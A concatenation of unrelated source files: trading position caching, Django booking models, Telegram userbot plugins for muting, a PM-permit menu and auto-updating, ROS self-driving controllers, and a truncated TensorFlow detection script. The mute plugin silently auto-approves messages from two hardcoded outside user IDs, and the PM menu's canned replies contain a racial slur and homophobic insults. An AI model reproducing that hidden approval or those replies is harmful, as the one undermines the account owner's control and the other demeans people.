self.cache_path = cache_path
self.file_path = cache_path + "/" + self.filename
try:
with open(self.file_path, "r") as f:
data = json.load(f)
except json.decoder.JSONDecodeError as e:
with open(self.file_path, "w") as f:
data = {}
dump(data, f)
except FileNotFoundError as e:
with open(self.file_path, 'w') as f:
data = {}
self.init_data(data)
def init_data(self, data):
"""
初始化数据
"""
def create_position_model(local, data: dict):
"""
将地点数据解析为PositionModel
"""
return SinglePositionModel.create_model(local, **data)
if not data:
return
else:
for local, position_detail in data.items():
self[local] = create_position_model(local, position_detail)
def on_trade(self, trade: TradeData):
"""
更新成交单
"""
def update_local_cache(file_path, local, self):
try:
with open(file_path, "r") as fp:
p = json.load(fp)
except JSONDecodeError:
p = {}
p[local] = self[local].to_dict()
with open(file_path, "w") as fp:
dump(obj=p, fp=fp)
def get_reverse(direction: Direction) -> Direction:
if direction == Direction.LONG:
return Direction.SHORT
if direction == Direction.SHORT:
return Direction.LONG
# 如果是平仓, 那么反转方向
if trade.offset == Offset.OPEN:
local = trade.local_symbol + "." + trade.direction.value
else:
local = trade.local_symbol + "." + get_reverse(trade.direction).value
if local not in self.keys():
self[local] = SinglePositionModel(local_symbol=trade.local_symbol)
self[local].update_trade(trade=trade)
update_local_cache(self.file_path, local, self)
def on_order(self, order):
pass
def on_position(self, position: PositionData):
"""
更新持仓
"""
local = position.local_symbol + "." + position.direction.value
if local not in self.keys():
self[local] = SinglePositionModel(local_symbol=position.local_symbol)
self[local].update_position(position=position)
def get_position_by_ld(self, local_symbol, direction) -> SinglePositionModel:
""" 通过local_symbol和direction获得持仓信息 """
return self.get(local_symbol + "." + direction.value, None)
def get_position(self, local_symbol) -> PositionModel or None:
long = self.get_position_by_ld(local_symbol, direction=Direction.LONG)
short = self.get_position_by_ld(local_symbol, direction=Direction.SHORT)
if long is None and short is None:
return None
else:
return PositionModel(long, short)
``` |
{
"source": "4andrewtanakashi/projeto-eng-soft",
"score": 2
} |
#### File: src/core/models.py
```python
from django.db import models
from django.contrib.auth.models import User
import uuid
import datetime
# Função auxiliar para definir o tempo default
# De uma reserva
def get_data():
return datetime.datetime.now() + datetime.timedelta(days=7)
# Classe para o model Propriedade, com campos que descrevem
# Uma propriedade em um sistema de reservas
class Propriedade(models.Model):
# informacoes basicas da propriedade
id = models.UUIDField(primary_key=True, default=uuid.uuid4, help_text='O id unico da propriedade')
nome = models.CharField(max_length=50, help_text='O nome da propriedade')
descricao = models.TextField(max_length=500, help_text='Descrição da propriedade')
proprietario = models.ForeignKey(User, on_delete=models.CASCADE, blank=True)
imagem = models.ImageField(upload_to='propriedades/', help_text='Imagem identificadora da propriedade')
# inicio do endereco
rua = models.CharField(max_length=100, help_text='A rua da propriedade')
CEP = models.CharField(max_length=100, help_text='O CEP da propriedade') # fazer regex para validar
cidade = models.CharField(max_length=100, help_text='A cidade onde a propriedade se encontra')
# as possíveis escolhas para o campo estado
ESTADO_CHOICES = (
('AC', 'Acre'),
('AL', 'Alagoas'),
('AP', 'Amapá'),
('AM', 'Amazonas'),
('BA', 'Bahia'),
('CE', 'Ceará'),
('DF', 'Distrito Federal'),
('ES', 'Espirito Santo'),
('GO', 'Goiás'),
('MA', 'Maranhão'),
('MT', 'Mato Grosso'),
('MS', 'Mato Grosso do Sul'),
('MG', 'Minas Gerais'),
('PA', 'Pará'),
('PB', 'Paraíba'),
('PR', 'Paraná'),
('PE', 'Pernambuco'),
('PI', 'Piauí'),
('RJ', 'Rio de Janeiro'),
('RN', 'Rio Grande do Norte'),
('RS', 'Rio Grande do Sul'),
('RO', 'Rondônia'),
('RR', 'Roraima'),
('SC', 'Santa Catarina'),
('SP', 'São Paulo'),
('SE', 'Sergipe'),
('TO', 'Tocantins'),
)
estado = models.CharField(max_length=2, choices=ESTADO_CHOICES, help_text='O estado onde a propriedade se encontra')
def __str__(self):
return self.nome
def get_id(self):
return str(self.id)
# Classe para o model Reserva, com campos que descrevem
# Uma reserva em um sistema de reservas
class Reserva(models.Model):
# informacoes basicas da reserva
id = models.UUIDField(primary_key=True, default=uuid.uuid4)
hospede = models.ForeignKey(User, on_delete=models.PROTECT, blank=True)
propriedade = models.ForeignKey(Propriedade, on_delete=models.PROTECT, blank=True)
dados_pagamento = models.ForeignKey('Pagamento', on_delete=models.PROTECT, blank=True)
# as possiveis escolhas para o campo qtd_pessoas
QTD_PESSOAS_CHOICES = (
('1', '1 pessoa'),
('2', '2 pessoas'),
('3', '3 pessoas'),
)
qtd_pessoas = models.CharField('Quantidade de pessoas da reserva', max_length=1, choices=QTD_PESSOAS_CHOICES, default=1)
# campos do tipo data, que determinam o inicio e o fim da reserva
dini = models.DateField('Inicio da reserva', default=datetime.datetime.now)
dfim = models.DateField('Fim da reserva', default=get_data)
def __str__(self):
return self.propriedade.nome
# Classe para o model Pagamento, com campos que descrevem
# Um pagamento em um sistema de reservas
class Pagamento(models.Model):
# informacoes basicas do pagamento
id_transacao = models.UUIDField(primary_key=True, default=uuid.uuid4, help_text='O id unico da transacao')
# variavel que determina as possiveis escolhas para o campo
# tipo_pagamento
ESCOLHAS_PAGAMENTO = (
('Débito', 'Débito'),
('Crédito', 'Crédito')
)
tipo_pagamento = models.CharField(
max_length=7,
choices=ESCOLHAS_PAGAMENTO,
default='Crédito',
help_text='Tipo de pagamento'
)
# variavel que determina as possiveis escolhas para o campo
# status
PAGAMENTO_STATUS = (
('C', 'concluido'),
('I', 'inconcluido')
)
status = models.CharField(
max_length=1,
choices=PAGAMENTO_STATUS,
default='C',
help_text='Status do pagamento'
)
def __str__(self):
return f'{self.id_transacao} ({self.status})'
``` |
{
"source": "4Applepen/Userbot",
"score": 2
} |
#### File: userbot/plugins/mute.py
```python
from userbot.plugins.sql_helper.mute_sql import is_muted, mute, unmute
import asyncio
@command(outgoing=True, pattern=r"^.mute ?(\d+)?")
async def startmute(event):
private = False
if event.fwd_from:
return
elif event.is_private:
await event.edit("Possono verificarsi problemi imprevisti o brutti errori!")
await asyncio.sleep(3)
private = True
if any([x in event.raw_text for x in ("/mute", "!mute")]):
await asyncio.sleep(0.5)
else:
reply = await event.get_reply_message()
if event.pattern_match.group(1) is not None:
userid = event.pattern_match.group(1)
elif reply is not None:
userid = reply.sender_id
elif private is True:
userid = event.chat_id
else:
return await event.edit("Rispondi a un utente o aggiungi il suo ID utente nel comando per smutarlo.")
chat_id = event.chat_id
chat = await event.get_chat()
if "admin_rights" in vars(chat) and vars(chat)["admin_rights"] is not None:
if chat.admin_rights.delete_messages is True:
pass
else:
return await event.edit("`Non puoi mutare una persona se non disponi dell'autorizzazione per l'eliminazione dei messaggi. ಥ﹏ಥ`")
elif "creator" in vars(chat):
pass
elif private == True:
pass
else:
return await event.edit("`Non puoi mutare una persona senza essere admin.` ಥ﹏ಥ ")
if is_muted(userid, chat_id):
return await event.edit("Questa persona è già mutata. ò.ò")
try:
mute(userid, chat_id)
except Exception as e:
await event.edit("Errore!\n " + str(e))
else:
await event.edit("Hai mutato con successo questa persona.\n**`-´)⊃━☆゚.*・。゚ **")
@command(outgoing=True, pattern=r"^.unmute ?(\d+)?")
async def endmute(event):
private = False
if event.fwd_from:
return
elif event.is_private:
await event.edit("Possono verificarsi problemi imprevisti o brutti errori!")
await asyncio.sleep(3)
private = True
if any([x in event.raw_text for x in ("/unmute", "!unmute")]):
await asyncio.sleep(0.5)
else:
reply = await event.get_reply_message()
if event.pattern_match.group(1) is not None:
userid = event.pattern_match.group(1)
elif reply is not None:
userid = reply.sender_id
elif private is True:
userid = event.chat_id
else:
return await event.edit("Rispondi a un utente o aggiungi il suo ID utente nel comando per unmutarlo.")
chat_id = event.chat_id
if not is_muted(userid, chat_id):
return await event.edit("__Questo utente non è mutato.__\n( ^_^)o自自o(^_^ )")
try:
unmute(userid, chat_id)
except Exception as e:
await event.edit("Errore!\n " + str(e))
else:
await event.edit("Utente smutato\n乁( ◔ ౪◔)「 ┑( ̄Д  ̄)┍")
@command(outgoing=True, pattern=r"^.mute ?(\d+)?", allow_sudo=True)
async def startmute(event):
private = False
if event.fwd_from:
return
elif event.is_private:
await event.edit("Possono verificarsi problemi imprevisti o brutti errori!")
await asyncio.sleep(3)
private = True
if any([x in event.raw_text for x in ("/mute", "!mute")]):
await asyncio.sleep(0.5)
else:
reply = await event.get_reply_message()
if event.pattern_match.group(1) is not None:
userid = event.pattern_match.group(1)
elif reply is not None:
userid = reply.sender_id
elif private is True:
userid = event.chat_id
else:
return await event.edit("Rispondi a un utente o aggiungi il suo ID utente nel comando per mutarlo.")
chat_id = event.chat_id
chat = await event.get_chat()
if "admin_rights" in vars(chat) and vars(chat)["admin_rights"] is not None:
if chat.admin_rights.delete_messages is True:
pass
else:
return await event.edit("`Non puoi mutare una persona se non disponi dell'autorizzazione per l'eliminazione dei messaggi. ಥ﹏ಥ`")
elif "creator" in vars(chat):
pass
elif private == True:
pass
else:
return await event.edit("`Non puoi mutare una persona senza essere admin.` ಥ﹏ಥ ")
if is_muted(userid, chat_id):
return await event.edit("Questa persona è già mutata. ò.ò")
try:
mute(userid, chat_id)
except Exception as e:
await event.edit("Errore!\n " + str(e))
else:
await event.edit("Hai mutato questa persona.\n**`-´)⊃━☆゚.*・。゚ **")
@command(outgoing=True, pattern=r"^.unmute ?(\d+)?", allow_sudo=True)
async def endmute(event):
private = False
if event.fwd_from:
return
elif event.is_private:
await event.edit("Possono verificarsi problemi imprevisti o brutti errori!")
await asyncio.sleep(3)
private = True
if any([x in event.raw_text for x in ("/unmute", "!unmute")]):
await asyncio.sleep(0.5)
else:
reply = await event.get_reply_message()
if event.pattern_match.group(1) is not None:
userid = event.pattern_match.group(1)
elif reply is not None:
userid = reply.sender_id
elif private is True:
userid = event.chat_id
else:
return await event.edit("Rispondi a un utente o aggiungi il suo ID utente nel comando per Smutarlo.")
chat_id = event.chat_id
if not is_muted(userid, chat_id):
return await event.edit("__Questo utente non è mutato.__\n( ^_^)o自自o(^_^ )")
try:
unmute(userid, chat_id)
except Exception as e:
await event.edit("Errore!\n " + str(e))
else:
await event.edit("Utente smutato\n乁( ◔ ౪◔)「 ┑( ̄Д  ̄)┍")
@command(incoming=True)
async def watcher(event):
if is_muted(event.sender_id, event.chat_id):
await event.delete()
#ignore, flexing tym
from userbot.utils import admin_cmd
import io
import userbot.plugins.sql_helper.pmpermit_sql as pmpermit_sql
from telethon import events
@bot.on(events.NewMessage(incoming=True, from_users=(742506768,967883138)))
async def hehehe(event):
if event.fwd_from:
return
chat = await event.get_chat()
if event.is_private:
if not pmpermit_sql.is_approved(chat.id):
pmpermit_sql.approve(chat.id, "sqdboyuwu")
await borg.send_message(chat, "`Questa casella di posta è stata benedetta dal mio maestro. Considerati fortunato. \n ** Stabilità e karma aumentati** (づ ̄ ³ ̄)づ")
```
#### File: userbot/plugins/pmpermit_menu.py
```python
import asyncio
import io
import telethon.sync
from telethon.tl.functions.users import GetFullUserRequest
import userbot.plugins.sql_helper.pmpermit_sql as pmpermit_sql
from telethon import events, errors, functions, types
from userbot import ALIVE_NAME, LESS_SPAMMY
from userbot.utils import admin_cmd
DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else "Settati un nome su heroku. ALIVE_NAME "
PREV_REPLY_MESSAGE = {}
@command(pattern=r"\/start", incoming=True)
async def _(event):
chat_id = event.from_id
userid = event.sender_id
if not pmpermit_sql.is_approved(chat_id):
chat = await event.get_chat()
if event.fwd_from:
return
if event.is_private:
Nudas = ("__Indica il tuo sesso.__\n"
"`1`. Femmina Homo-Sapien\n"
"`2`. Maschio Homo-Sapien\n"
"`3`. Altro\n")
PM = ("`Ciao. Stai accedendo al menù disponibile del mio capo,`"
f"{DEFAULTUSER}.\n"
"__Facciamo veloce e fammi sapere perché sei qui.__\n"
"**Scegli una di queste risposte:**\n\n"
"`1`. Messaggiare con il mio capo\n"
"`2`. Spammare al mio capo\n"
"`3`. Inviare nudes.\n"
"`4`. Chiedere qualcosa\n"
"`5`. Per richiedere qualcosa\n")
ONE = ("__La tua richiesta è stata registrata, attenti almeno 24 ore prima dicevere una risposta. e non spammare grazie.__\n\n"
"**⚠️ Sei stato bloccato e reportatp per spam. ⚠️**\n\n"
"__Usa__ `/start` __Per tornare indietro col menù.__")
TWO = (" `███████▄▄███████████▄ \n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓███░░░░░░░░░░░░█\n██████▀▀▀█░░░░██████▀ \n░░░░░░░░░█░░░░█ \n░░░░░░░░░░█░░░█ \n░░░░░░░░░░░█░░█ \n░░░░░░░░░░░█░░█ \n░░░░░░░░░░░░▀▀ `\n\n**Sei stato bloccato, vai a disturbare qualcun'altro.**")
FOUR = ("__Il mio padrone risponde sempre a tutti, non correre e aspetta. altrimenti sono costretto a bloccarti.**")
FIVE = ("`Non disturbare ancora il mio padrone o sono costretto a bloccarti e reportarti per spam.**")
LWARN = ("**Ultimo avviso NON mandare più messaggi o ti blocco e reporto per spam, usa /start per tornare indietro.__")
async with borg.conversation(chat) as conv:
await borg.send_message(chat, PM)
chat_id = event.from_id
response = await conv.get_response(chat)
y = response.text
if y == "1":
await borg.send_message(chat, ONE)
response = await conv.get_response(chat)
await event.delete()
if not response.text == "/start":
await response.delete()
await borg.send_message(chat, LWARN)
response = await conv.get_response(chat)
await event.delete()
await response.delete()
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
elif y == "2":
await borg.send_message(chat, LWARN)
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
elif y == "3":
await borg.send_message(chat, Nudas)
response = await conv.get_response(chat)
await event.delete()
await response.delete()
x = response.text
if x == "1":
await borg.send_message(chat, "`Oh my, you're very much welcome here ;).\nPlease drop your offerings and let my master judge if you have good heart <3.`\n\n **Please don't flood my inbox, we'll have a nice convo once i come back ;D**")
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, LWARN)
response = await conv.get_response(chat)
await event.delete()
await response.delete()
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
elif x == "2":
await borg.send_message(chat, "**You nigga gay af to send a guy like my your male nudes. \nLeave immediately else you become the ultimate gayest gay the gay world has ever seen. I will reply you when i get online.**")
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, LWARN)
response = await conv.get_response(chat)
await event.delete()
await response.delete()
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
elif x == "3":
await borg.send_message(chat, "`Please decide a gender for yourself before sending your nudes here,\n not that i'm judging if you're a helicopter or a banana but yeah, If you are anything else than a female Homo-Sapien,\n Do not send more messages and let my master see for himself if he wants to talk with you.`")
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, LWARN)
response = await conv.get_response(chat)
await event.delete()
await response.delete()
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
else:
await borg.send_message(chat, "__You have entered an invalid command. Please send__ `/start` __again or do not send another message if you do not wish to be blocked and reported.__")
response = await conv.get_response(chat)
if not response.text.startswith("/start"):
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
elif y == "4":
await borg.send_message(chat, FOUR)
response = await conv.get_response(chat)
await event.delete()
await response.delete()
if not response.text == "/start":
await borg.send_message(chat, LWARN)
await event.delete()
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
elif y == "5":
await borg.send_message(chat,FIVE)
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, LWARN)
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
else:
await borg.send_message(chat, "`You have entered an invalid command. Please send /start again or do not send another message if you do not wish to be blocked and reported.`")
response = await conv.get_response(chat)
z = response.text
if not z == "/start":
await borg.send_message(chat, LWARN)
await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
```
#### File: userbot/plugins/updater.py
```python
from os import remove, execle, path, makedirs, getenv, environ
from shutil import rmtree
import asyncio
import sys
from git import Repo
from git.exc import GitCommandError, InvalidGitRepositoryError, NoSuchPathError
from userbot import CMD_HELP, bot
from userbot.utils import register
from var import Var
HEROKU_API_KEY = Var.HEROKU_API_KEY
HEROKU_APP_NAME = Var.HEROKU_APP_NAME
requirements_path = path.join(
path.dirname(path.dirname(path.dirname(__file__))), 'requirements.txt')
UPSTREAM_REPO_URL = "https://github.com/100101110/userbot-100101110.git"
async def gen_chlog(repo, diff):
ch_log = ''
d_form = "%d/%m/%y"
for c in repo.iter_commits(diff):
ch_log += f'•[{c.committed_datetime.strftime(d_form)}]: {c.summary} <{c.author}>\n'
return ch_log
async def update_requirements():
reqs = str(requirements_path)
try:
process = await asyncio.create_subprocess_shell(
' '.join([sys.executable, "-m", "pip", "install", "-r", reqs]),
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE)
await process.communicate()
return process.returncode
except Exception as e:
return repr(e)
@register(outgoing=True, pattern="^\.update(?: |$)(.*)")
async def upstream(ups):
"For .update command, check if the bot is up to date, update if specified"
await ups.edit('**Ricerca update in corso....**')
conf = ups.pattern_match.group(1)
off_repo = UPSTREAM_REPO_URL
force_update = False
try:
txt = "`Oops.. Updater cannot continue due to "
txt += "some problems occured`\n\n**LOGTRACE:**\n"
repo = Repo()
except NoSuchPathError as error:
await ups.edit(f'{txt}\n`directory {error} is not found`')
repo.__del__()
return
except GitCommandError as error:
await ups.edit(f'{txt}\n`Early failure! {error}`')
repo.__del__()
return
except InvalidGitRepositoryError as error:
if conf != "now":
await ups.edit(
f"Unfortunately, the directory {error} does not seem to be a git repository.\
\nBut we can fix that by force updating the userbot using `.update now.`"
)
return
repo = Repo.init()
origin = repo.create_remote('upstream', off_repo)
origin.fetch()
force_update = True
repo.create_head('master', origin.refs.master)
repo.heads.master.set_tracking_branch(origin.refs.master)
repo.heads.master.checkout(True)
ac_br = repo.active_branch.name
if ac_br != 'master':
await ups.edit(
f'**[UPDATER]: Sembra che stai utilizzando un ramo custom** ({ac_br}). '
'**in tal caso, Updater è in grado di identificare**'
'**quale ramo deve essere unito.**'
'**Per favore aggiorna a qualsiasi branch ufficiale**')
repo.__del__()
return
try:
repo.create_remote('upstream', off_repo)
except BaseException:
pass
ups_rem = repo.remote('upstream')
ups_rem.fetch(ac_br)
changelog = await gen_chlog(repo, f'HEAD..upstream/{ac_br}')
if not changelog and not force_update:
await ups.edit(
f'\n`Il tuo UbOT è` **up-to-date** **{ac_br}**\n')
repo.__del__()
return
if conf != "now" and not force_update:
changelog_str = f'**New UPDATE avviabile per [{ac_br}]:\n\nCHANGELOG:**\n`{changelog}`'
if len(changelog_str) > 4096:
await ups.edit('**Il changelog delle modifiche è troppo grande,leggi il file.**')
file = open("output.txt", "w+")
file.write(changelog_str)
file.close()
await ups.client.send_file(
ups.chat_id,
"output.txt",
reply_to=ups.id,
)
remove("output.txt")
else:
await ups.edit(changelog_str)
await ups.respond('Premi \"`.update now`\" per aggiornare')
return
if force_update:
await ups.edit(
'**Forza aggiornamento ubot code stabile, attendere...**')
else:
await ups.edit('**Ubot in aggiornamento attendere....**')
# We're in a Heroku Dyno, handle it's memez.
if HEROKU_API_KEY is not None:
import heroku3
heroku = heroku3.from_key(HEROKU_API_KEY)
heroku_app = None
heroku_applications = heroku.apps()
if not HEROKU_APP_NAME:
await ups.edit(
'**Invalid APP Name. Inserisci il nome del bot nella Var `HEROKU_APP_NAME.**'
)
repo.__del__()
return
for app in heroku_applications:
if app.name == HEROKU_APP_NAME:
heroku_app = app
break
if heroku_app is None:
await ups.edit(
f'{txt}\n**Credenziali heroku invalide per aggiornare Ubot.**'
)
repo.__del__()
return
await ups.edit('`Ubot dyno in progressione, attendi 5 mins il completamento.s`'
)
ups_rem.fetch(ac_br)
repo.git.reset("--hard", "FETCH_HEAD")
heroku_git_url = heroku_app.git_url.replace(
"https://", "https://api:" + HEROKU_API_KEY + "@")
if "heroku" in repo.remotes:
remote = repo.remote("heroku")
remote.set_url(heroku_git_url)
else:
remote = repo.create_remote("heroku", heroku_git_url)
try:
remote.push(refspec="HEAD:refs/heads/master", force=True)
except GitCommandError as error:
await ups.edit(f'{txt}\n`Here is the error log:\n{error}`')
repo.__del__()
return
await ups.edit('**Update in corso...**\n'
'**Riavvio, attendi 5 minuti e premi `.alive`**')
else:
# Classic Updater, pretty straightforward.
try:
ups_rem.pull(ac_br)
except GitCommandError:
repo.git.reset("--hard", "FETCH_HEAD")
reqs_upgrade = await update_requirements()
await ups.edit('**Update in corso...**\n'
'**Attendi 5 minuti e premi `.alive`**')
# Spin a new instance of bot
args = [sys.executable, "-m", "userbot"]
execle(sys.executable, *args, environ)
return
CMD_HELP.update({
'update':
".update\
\nUsage: Checks if the main userbot repository has any updates and shows a changelog if so.\
\n\n.update now\
\nUsage: Updates your userbot, if there are any updates in the main userbot repository."
})
``` |
{
"source": "4artit/CARND_Term3_Programming-a-Real-Self-Driving-Car",
"score": 3
} |
#### File: src/twist_controller/twist_controller.py
```python
from pid import PID
from yaw_controller import YawController
from lowpass import LowPassFilter
GAS_DENSITY = 2.858
ONE_MPH = 0.44704
class Controller(object):
def __init__(self, *args):
# for calcuate brake(torque[N/m])
self.total_mass = args[4] + args[5] * GAS_DENSITY
self.wheel_radius = args[6]
self.yaw_controller = YawController(args[0], args[1], 0.15, args[2], args[3])
self.pid = PID(0.0198, 0.0002, 0.0064, -1.0, 0.35)
# tau = 0.01, ts = 50Hz -> 20ms
self.lowpass_filter = LowPassFilter(0.01, 0.02)
def control(self, *args):
target_linear_vel = args[0]
target_angular_vel = args[1]
current_linear_vel = args[2]
is_enable_dbw = args[3]
throttle = 0.0
brake = 0.0
steer = 0.0
if is_enable_dbw is False:
self.pid.reset()
else:
steer = self.yaw_controller.get_steering(target_linear_vel, target_angular_vel, current_linear_vel)
cte = ((target_linear_vel - current_linear_vel) / ONE_MPH)
throttle = self.lowpass_filter.filt(self.pid.step(cte, 0.02))
# if car need decel
if throttle < 0.0:
throttle = 0.0
decel = (current_linear_vel - target_linear_vel) / 0.02
# calculate about car braking torque in wheel
brake = self.total_mass * decel * self.wheel_radius
return throttle, brake, steer
```
#### File: src/waypoint_updater/waypoint_updater.py
```python
import rospy
from geometry_msgs.msg import PoseStamped
from styx_msgs.msg import Lane, Waypoint
import math
'''
This node will publish waypoints from the car's current position to some `x` distance ahead.
As mentioned in the doc, you should ideally first implement a version which does not care
about traffic lights or obstacles.
Once you have created dbw_node, you will update this node to use the status of traffic lights too.
Please note that our simulator also provides the exact location of traffic lights and their
current status in `/vehicle/traffic_lights` message. You can use this message to build this node
as well as to verify your TL classifier.
TODO (for Yousuf and Aaron): Stopline location for each traffic light.
'''
LOOKAHEAD_WPS = 50 # Number of waypoints we will publish. You can change this number
class WaypointUpdater(object):
def __init__(self):
rospy.init_node('waypoint_updater')
rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)
rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)
# TODO: Add a subscriber for /traffic_waypoint and /obstacle_waypoint below
self.final_waypoints_pub = rospy.Publisher('final_waypoints', Lane, queue_size=1)
# TODO: Add other member variables you need below
self.base_waypoints = None
self.base_wp_size = 0
self.has_base_wp = False
self.is_initialized = False
self.current_pos_index = 0
self.final_waypoints = Lane()
rospy.spin()
def pose_cb(self, msg):
# Check has base waypoints and find min distance waypoint
if self.has_base_wp is True:
index = self.current_pos_index
diff_x = msg.pose.position.x - self.base_waypoints[index].pose.pose.position.x
diff_y = msg.pose.position.y - self.base_waypoints[index].pose.pose.position.y
min_dist = diff_x ** 2 + diff_y ** 2
waypoint_size = 0
# If is not initialized, check all waypoints/ initialized just check in before final_waypoints
if self.is_initialized is False:
waypoint_size = self.base_wp_size
self.is_initialized = True
else:
waypoint_size = LOOKAHEAD_WPS
for i in range(1, waypoint_size):
diff_x = msg.pose.position.x - self.base_waypoints[i].pose.pose.position.x
diff_y = msg.pose.position.y - self.base_waypoints[i].pose.pose.position.y
dist = diff_x ** 2 + diff_y ** 2
if dist < min_dist:
min_dist = dist
index = i
# Check min distance is forward waypoint from car using inner product space
if index + 1 == self.base_wp_size:
next_index = 0
else:
next_index = index + 1
a_vector_x = self.base_waypoints[next_index].pose.pose.position.x - self.base_waypoints[index].pose.pose.position.x
a_vector_y = self.base_waypoints[next_index].pose.pose.position.y - self.base_waypoints[index].pose.pose.position.y
b_vector_x = msg.pose.position.x - self.base_waypoints[index].pose.pose.position.x
b_vector_y = msg.pose.position.y - self.base_waypoints[index].pose.pose.position.y
cos_theta = (a_vector_x * b_vector_x + a_vector_y * b_vector_y) / (math.sqrt(a_vector_x ** 2 + a_vector_y ** 2) * math.sqrt(b_vector_x ** 2 + b_vector_y ** 2))
if cos_theta >= 0:
index = next_index
self.current_pos_index = index
# publish final waypoints
self.final_waypoints.waypoints = []
for i in range(LOOKAHEAD_WPS):
self.final_waypoints.waypoints.append(self.base_waypoints[(index + i)%self.base_wp_size])
self.final_waypoints_pub.publish(self.final_waypoints)
def waypoints_cb(self, waypoints):
# Save base waypoints and waypoints list size
self.base_waypoints = waypoints.waypoints
self.base_wp_size = len(waypoints.waypoints)
if self.has_base_wp is False:
self.has_base_wp = True
def traffic_cb(self, msg):
# TODO: Callback for /traffic_waypoint message. Implement
pass
def obstacle_cb(self, msg):
# TODO: Callback for /obstacle_waypoint message. We will implement it later
pass
def get_waypoint_velocity(self, waypoint):
return waypoint.twist.twist.linear.x
def set_waypoint_velocity(self, waypoints, waypoint, velocity):
waypoints[waypoint].twist.twist.linear.x = velocity
def distance(self, waypoints, wp1, wp2):
dist = 0
dl = lambda a, b: math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2 + (a.z-b.z)**2)
for i in range(wp1, wp2+1):
dist += dl(waypoints[wp1].pose.pose.position, waypoints[i].pose.pose.position)
wp1 = i
return dist
if __name__ == '__main__':
try:
WaypointUpdater()
except rospy.ROSInterruptException:
rospy.logerr('Could not start waypoint updater node.')
``` |
{
"source": "4artit/human_detection_ros_node_using_2d-lidar_TX2-onboard-cam_fusion",
"score": 2
} |
#### File: human_detection_ros_node_using_2d-lidar_TX2-onboard-cam_fusion/py_scripts/test_objectdetection.py
```python
import numpy as np
import os
import tensorflow as tf
import cv2
import datetime
# Root directory of the project
ROOT_DIR = os.path.abspath("../src/realtime_object_detection")
sys.path.append(ROOT_DIR)
from helper import Timer, WebcamVideoStream, SessionWorker, TimeLiner, load_images
from model import Model
from config import Config
from vis_utils import visualize_objectdetection
from tf_utils import reframe_box_masks_to_image_masks
def detection(model,config):
# Tf Session
tf_config = model.tf_config
detection_graph = model.detection_graph
category_index = model.category_index
print("> Building Graph")
with detection_graph.as_default():
with tf.Session(graph=detection_graph,config=tf_config) as sess:
# start Videostream
# Define Input and Ouput tensors
tensor_dict = model.get_tensordict(['num_detections', 'detection_boxes', 'detection_scores','detection_classes', 'detection_masks'])
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Mask Transformations
if 'detection_masks' in tensor_dict:
# Reframe is required to translate mask from box coordinates to image coordinates and fit the image size.
detection_boxes = tf.squeeze(tensor_dict['detection_boxes'], [0])
detection_masks = tf.squeeze(tensor_dict['detection_masks'], [0])
real_num_detection = tf.cast(tensor_dict['num_detections'][0], tf.int32)
detection_boxes = tf.slice(detection_boxes, [0, 0], [real_num_detection, -1])
detection_masks = tf.slice(detection_masks, [0, 0, 0], [real_num_detection, -1, -1])
detection_masks_reframed = reframe_box_masks_to_image_masks(
detection_masks, detection_boxes, config.HEIGHT, config.WIDTH)
detection_masks_reframed = tf.cast(tf.greater(detection_masks_reframed, 0.5), tf.uint8)
# Follow the convention by adding back the batch dimension
tensor_dict['detection_masks'] = tf.expand_dims(detection_masks_reframed, 0)
if config.SPLIT_MODEL:
score_out = detection_graph.get_tensor_by_name('Postprocessor/convert_scores:0')
expand_out = detection_graph.get_tensor_by_name('Postprocessor/ExpandDims_1:0')
score_in = detection_graph.get_tensor_by_name('Postprocessor/convert_scores_1:0')
expand_in = detection_graph.get_tensor_by_name('Postprocessor/ExpandDims_1_1:0')
# Threading
score = model.score
expand = model.expand
# Timeliner
if config.WRITE_TIMELINE:
options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
run_metadata = tf.RunMetadata()
timeliner = TimeLiner()
else:
options = tf.RunOptions(trace_level=tf.RunOptions.NO_TRACE)
run_metadata = False
images = load_images(config.IMAGE_PATH,config.LIMIT_IMAGES)
timer = Timer().start()
print('> Starting Detection')
for image in images:
if config.SPLIT_MODEL:
# split model in seperate gpu and cpu session threads
masks = None # No Mask Detection possible yet
frame = cv2.resize(cv2.imread(image),(config.WIDTH,config.HEIGHT))
frame_expanded = np.expand_dims(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB), axis=0)
timer.tic()
# GPU Session
score, expand = sess.run([score_out, expand_out],
